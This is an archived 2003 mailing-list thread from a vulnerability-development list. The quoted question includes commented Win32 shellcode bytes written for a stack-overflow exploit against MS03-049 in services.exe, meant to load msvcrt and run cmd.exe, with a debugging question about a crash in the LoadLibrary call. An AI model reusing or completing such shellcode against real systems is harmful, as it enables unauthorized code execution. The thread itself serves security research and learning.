Vulnerability Development mailing list archives
Re: Win32 Shellcode question.
From: Tobias Klein <tobias.klein () ewetel de>
Date: Mon, 01 Dec 2003 09:07:12 +0100
http://www.newroot.de/projects/winsys.c

greets
newroot

At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:
I was writing an exploit for the MS03-049 services.exe stack overflow vuln (from scratch for my own academic interest). Here's my shellcode to simply launch a "cmd.exe" shell.

#define LL  0x7C4F05CF
#define SYS 0x78018EBF

char payload[] = {
    0x55,                                     // push ebp
    0x8B, 0xEC,                               // mov ebp,esp
    0x33, 0xC0,                               // xor eax,eax
    0x50,                                     // push eax
    0x50,                                     // push eax
    0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63, // mov dword ptr [ebp-8],6376736Dh
    0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,       // mov word ptr [ebp-4],7472h
    0x8D, 0x45, 0xF8,                         // lea eax,[ebp-8]
    0x50,                                     // push eax
    0xB8, 0xCF, 0x05, 0x4F, 0x7C,             // mov eax,LL
    0xFF, 0xD0,                               // call eax   <------------ Problem call
    0x8B, 0xE5,                               // mov esp,ebp
    0x33, 0xC0,                               // xor eax,eax
    0x50,                                     // push eax
    0x50,                                     // push eax
    0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E, // mov dword ptr [ebp-8],2E646D63h
    0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,       // mov word ptr [ebp-4],7865h
    0xC6, 0x45, 0xFE, 0x65,                   // mov byte ptr [ebp-2],65h
    0x8D, 0x45, 0xF8,                         // lea eax,[ebp-8]
    0x50,                                     // push eax
    0xB8, 0xBF, 0x8E, 0x01, 0x78,             // mov eax,SYS
    0xFF, 0xD0,                               // call eax
    ...
};

After the overflow, I can step through the NOP sled and reach the above payload, meaning I have control over the CPU's exec path and can make it execute my payload. However, I keep getting an "Access Violation writing location ..." error inside the "call eax" that corresponds with LoadLibrary("msvcrt").

I have confirmed the LL and SYS variables for the target (Win2k SP4). Plus, the payload works just fine when compiled and executed outside of services.exe. Is there something special about services.exe that prevents LoadLibraryA from executing normally, or what did I do wrong? Can you spot anything I am overlooking? The same payload has worked on other stack-overflow exploits, and inside a simple main(){} loop.

Thanks,
Vinay.
Current thread:
- Re: Win32 Shellcode question. Tobias Klein (Dec 01)
- RE: [PenTest] Re: Win32 Shellcode question. Brett Moore (Dec 01)